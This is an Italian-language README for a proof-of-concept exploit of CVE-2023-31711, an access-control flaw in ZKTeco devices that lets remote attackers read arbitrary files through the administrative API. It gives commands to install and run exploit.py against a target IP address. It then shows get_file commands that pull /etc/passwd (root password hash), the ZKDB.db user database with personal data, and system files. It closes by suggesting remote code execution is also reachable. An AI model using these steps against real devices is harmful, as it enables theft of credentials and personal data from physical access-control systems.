CVE-2023-31711
Controllo degli accessi non corretto in ZKTECO consente ad attaccanti remoti di leggere qualsiasi file tramite l'API amministrativa.
Installazione dei moduli richiesti
- All'interno della directory ZKTEco:
$ pip install -r ./pyzatt/requirements_dev.txt
Esecuzione dell'exploit
- All'interno della directory ZKTEco:
$ python exploit.py <ip_address>
Connected to 10.0.2.25
(Cmd) get_file <file_name>
Esempi:
get_file /etc/passwd: Divulga l'hash della password di root
get_file /mnt/mtdblock/data/ZKDB.db: Divulga le PII degli utenti registrati. Per leggere il contenuto, potrebbe essere necessario eseguire questo comando in sequenza più volte finché l'intero contenuto
venga divulgato
get_file /mnt/mtdblock/data/ZKSystem.db: Divulga informazioni sensibili relative al sistema
Crediti
Nota
I dispositivi potrebbero essere potenzialmente vulnerabili anche a Remote Code Execution tramite l'uso dell'API amministrativa. L'exploit menzionato nella sezione Crediti potrebbe essere un buon punto di partenza per trovare un test per questa vulnerabilità.